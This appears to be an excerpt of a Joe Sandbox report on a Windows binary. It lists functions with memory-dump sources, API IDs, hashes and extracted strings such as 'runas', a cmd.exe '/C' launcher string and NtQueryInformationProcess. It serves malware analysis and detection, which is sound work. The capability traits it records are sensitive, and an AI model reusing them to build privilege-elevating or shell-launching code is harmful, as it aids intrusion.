                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                                                                                    • Opcode ID: af451be784cd1612df3aad53b5d54c203146c96e75ed0741bde73cc1dd9b507a
                                                                                                                                                                                                                                                    • Instruction ID: d79ee1cfe8a9a4e691c682836160e96de455094a90f98e528cb663fc3142c860
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: af451be784cd1612df3aad53b5d54c203146c96e75ed0741bde73cc1dd9b507a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5FD0C925B39542C3E340AF51D885BA5A368B798701FD05025E94A81698CF7CD299CB21
                                                                                                                                                                                                                                                    Function 00007FF749F8ED00 Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(?,?,?,00007FF749F8E68D,?,?,00000000,00007FF749F7D9CF,?,?,?,00007FF749F8C5CB,?,00000000,?,00007FF749F8C4C1), ref: 00007FF749F8ED3E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AllocHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4292702814-0
                                                                                                                                                                                                                                                    • Opcode ID: 9c33abf06edc4973dd13413fb3fae6b4b6ada102295991483a2b98f6ebe4a3f4
                                                                                                                                                                                                                                                    • Instruction ID: 1e69d75b78b5645cb91a13d28d89c8e0852f0de156cb91bab7f3e0d8ae589687
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c33abf06edc4973dd13413fb3fae6b4b6ada102295991483a2b98f6ebe4a3f4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1BF0F812B4D206C5FFA8BEA158492B5D1A05FA57A0FC84A30ED2E9A2C5EF2CE4494630

                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                    Function 00007FF749F67268 Relevance: 81.8, APIs: 54, Instructions: 808COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$GetcollGetctypeGetvals
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 553569086-0
                                                                                                                                                                                                                                                    • Opcode ID: 550fe537e3995708685281ba595a73be6ebecc8fbae1a6eacc8b5c44945c65f2
                                                                                                                                                                                                                                                    • Instruction ID: 560f696d762d8bed3ff0a9e5608eb1a884363ec5a2959cb078123b56995e7c53
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 550fe537e3995708685281ba595a73be6ebecc8fbae1a6eacc8b5c44945c65f2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB824D62A0DB42C5FB45BF21D8902B9B7B0AF94784BD84535E90E467D6DF3CE982C360
                                                                                                                                                                                                                                                    Function 00007FF749F665C4 Relevance: 81.8, APIs: 54, Instructions: 808COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$GetcollGetctype
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 19648113-0
                                                                                                                                                                                                                                                    • Opcode ID: 208578fbf0aff5e00fbc3174e06ca2abcd74e2038bad76ee8959a3c603800faa
                                                                                                                                                                                                                                                    • Instruction ID: c72a7ff790d489bb143522ac8ac04e556f77fc77679af3091e63404c2a244b79
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 208578fbf0aff5e00fbc3174e06ca2abcd74e2038bad76ee8959a3c603800faa
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C822A61E0DB42C5EB49FF21D8902B8A7B0AF54784FC94535E90E476D6EE3CE982C361
                                                                                                                                                                                                                                                    Function 00007FF749F73A33 Relevance: 50.0, APIs: 33, Instructions: 485COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getcoll
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2318601406-0
                                                                                                                                                                                                                                                    • Opcode ID: 7b9aeb7c851e121a815c255632410949109334a64af1fb91696ada00cf8e8c7f
                                                                                                                                                                                                                                                    • Instruction ID: cefbc9bbd200283d53a092f4897142c96e85cac1ac963fe3d08a975287cfdf68
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7b9aeb7c851e121a815c255632410949109334a64af1fb91696ada00cf8e8c7f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A223821E0DA42D5FB49BF15E8941B8A3B4AF54B84FD84035EA0E477D6EE7CE581C3A0
                                                                                                                                                                                                                                                    Function 00007FF749F485C0 Relevance: 44.2, APIs: 21, Strings: 4, Instructions: 403filememoryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Local$Free$ByteCharMultiWide_invalid_parameter_noinfo_noreturn$AllocExecuteFileShell$CloseCreateHandleWrite
                                                                                                                                                                                                                                                    • String ID: -_.~!*'();:@&=+$,/?#[]$URL Shortcut content:$[InternetShortcut]URL=$open
                                                                                                                                                                                                                                                    • API String ID: 3074492896-3004881174
                                                                                                                                                                                                                                                    • Opcode ID: 678960cae7f20f7201e0e4798983c1c9bcf00aa199cdc569d3a41715cdf64e7f
                                                                                                                                                                                                                                                    • Instruction ID: 7c0dabce483b8da314b5ec993d40bb6887e5e0f3a8e332ddcc4d0ad2762b7a40
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 678960cae7f20f7201e0e4798983c1c9bcf00aa199cdc569d3a41715cdf64e7f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F0F18A62B0CB82C6EB10BF69E4506BAA7B1FB55B94F805535DA8D17BE4DF3CD4848320
                                                                                                                                                                                                                                                    Function 00007FF749F8412C Relevance: 43.8, APIs: 22, Strings: 2, Instructions: 1842COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memcpy_s$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID: $
                                                                                                                                                                                                                                                    • API String ID: 2880407647-227171996
                                                                                                                                                                                                                                                    • Opcode ID: 701cb34dc56a9cac992b2a95d969c89398ee0eab0c9fa9fc59a33e8c86b7dbb1
                                                                                                                                                                                                                                                    • Instruction ID: 34bbd25023b18c52a69f078981b8f0d2807a635e095c5d0041acce8cbfeb390a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 701cb34dc56a9cac992b2a95d969c89398ee0eab0c9fa9fc59a33e8c86b7dbb1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3703E772A1C192CBE7B5EE259440BF9F7B5F794788F841135DA0A67BC4DB38A9008750
                                                                                                                                                                                                                                                    Function 00007FF749F472B0 Relevance: 33.5, APIs: 12, Strings: 7, Instructions: 272threadsynchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Window$ForegroundProcessThread$ExecuteShell$AllowAttachCodeCurrentDirectoryExitInputObjectSingleWaitWindows_invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID: %s\System32\cmd.exe$.bat$.cmd$/C ""%s" %s"$open$p$runas
                                                                                                                                                                                                                                                    • API String ID: 2597257165-4290413618
                                                                                                                                                                                                                                                    • Opcode ID: 80b171278b897e4481ec00f561564a1d4a1d7c69124deb606ecbe9a023986acd
                                                                                                                                                                                                                                                    • Instruction ID: 2a506b21928e823817767c6417a3de6d3d625f6fbda89dccd7d1005464294263
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 80b171278b897e4481ec00f561564a1d4a1d7c69124deb606ecbe9a023986acd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FCC16A32B08A45C6EB10BF69E8509ADA371FB94BA8F904231DA5E477E9DF3CD441C750
                                                                                                                                                                                                                                                    Function 00007FF749F56AC7 Relevance: 31.8, APIs: 21, Instructions: 306COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3087743877-0
                                                                                                                                                                                                                                                    • Opcode ID: 996ca0b3f0dfe8b4793054b43d57929c22226cf19784e62d5a6ad68a3a4f31f7
                                                                                                                                                                                                                                                    • Instruction ID: 622d9cb12b44ed5247a281d40b2620a5c02e302d065c3a344c974de8ededceea
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 996ca0b3f0dfe8b4793054b43d57929c22226cf19784e62d5a6ad68a3a4f31f7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 96D16AA2A0DA42D1EB49BF25D8902B5A3B1EF607E4FC64131D91D436D6DF7CB641C321
                                                                                                                                                                                                                                                    Function 00007FF749F98A80 Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1223COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                                                                                                                                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                    • API String ID: 808467561-2761157908
                                                                                                                                                                                                                                                    • Opcode ID: e74b7c554f0aa12a6b9c746d306bf12b71be30ff750c5c24f689410cfc5ee520
                                                                                                                                                                                                                                                    • Instruction ID: ca1ff963b25e3dc5d11b738ed330b6565f2b26db4c5023c48ef98a7e43079e2b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e74b7c554f0aa12a6b9c746d306bf12b71be30ff750c5c24f689410cfc5ee520
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BFB2F372A1C282CBE764AF69D540BFDB7B1FB45388F915135DA0A57EC8DB38A640CB10
                                                                                                                                                                                                                                                    Function 00007FF749F6E4A0 Relevance: 23.8, APIs: 8, Strings: 5, Instructions: 1099COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::cancel_current_task$_invalid_parameter_noinfo_noreturn$AllocLocalLockitLockit::_std::_
                                                                                                                                                                                                                                                    • String ID: %$%.0Lf$+$0123456789-$0123456789-
                                                                                                                                                                                                                                                    • API String ID: 4069415512-1072446943
                                                                                                                                                                                                                                                    • Opcode ID: 68b818fdd4fa0d3491a4a663ffc368d1b1ade6ce1f83f0a6d6487fda03f9679b
                                                                                                                                                                                                                                                    • Instruction ID: fc8b7e7b7869c3ec43955df37c438eb574215a164659a5051f2de839183afaee
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68b818fdd4fa0d3491a4a663ffc368d1b1ade6ce1f83f0a6d6487fda03f9679b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 28A2BE22B08B85C5EB10FFA5E4543ADA371EB54B98F904232DE6D13BE9DE38D956C310
                                                                                                                                                                                                                                                    Function 00007FF749F45F60 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 215libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorLastLibraryMemoryProcessRead$AddressDirectoryFreeLoadProcSystem_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID: NtQueryInformationProcess
                                                                                                                                                                                                                                                    • API String ID: 2371894688-2781105232
                                                                                                                                                                                                                                                    • Opcode ID: fa4e8a4a4fe302e818cb703e1c28a202aba8cba095d5580f8156be16ff62753c
                                                                                                                                                                                                                                                    • Instruction ID: 33cf4cf00c387974a5ca496b16f27b951738fe28d7482ad1da0f17b30aa23d04
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fa4e8a4a4fe302e818cb703e1c28a202aba8cba095d5580f8156be16ff62753c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6B14022A58BC2C6EB209F20D8447EC73B0FB9478CF505235DA4916AA9DF7CE2D5C754
                                                                                                                                                                                                                                                    Function 00007FF749F6B2F0 Relevance: 14.6, APIs: 1, Strings: 7, Instructions: 584COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F4F8A0: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF749F4F8B5
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F4F8A0: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF749F4F8DA
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F4F8A0: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF749F4F905
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F4F8A0: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FF749F4F9A6
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF749F6B601
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                                                                                                                                                                                                    • API String ID: 533778753-2891247106
                                                                                                                                                                                                                                                    • Opcode ID: 4734cba8c0ebb69a97ca93dca8d55ba972b5f41057bfdbc9d0f9bcfce3cc0323
                                                                                                                                                                                                                                                    • Instruction ID: ea889f661ed30827eba3020b5743670ba392af958bfcb3d05b7cb841b2fa156a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4734cba8c0ebb69a97ca93dca8d55ba972b5f41057bfdbc9d0f9bcfce3cc0323
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 89426B32A1CB46C9EB14AF65D4501BCB771FB49B88B844135EE4D13BA9DF38E946C350
                                                                                                                                                                                                                                                    Function 00007FF749F76010 Relevance: 13.0, APIs: 4, Strings: 3, Instructions: 790COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F4CBB0: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF749F4CBC5
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF749F4CBB0: std::_Lockit::_Lockit.LIBCPMT ref: 00007FF749F4CBEA
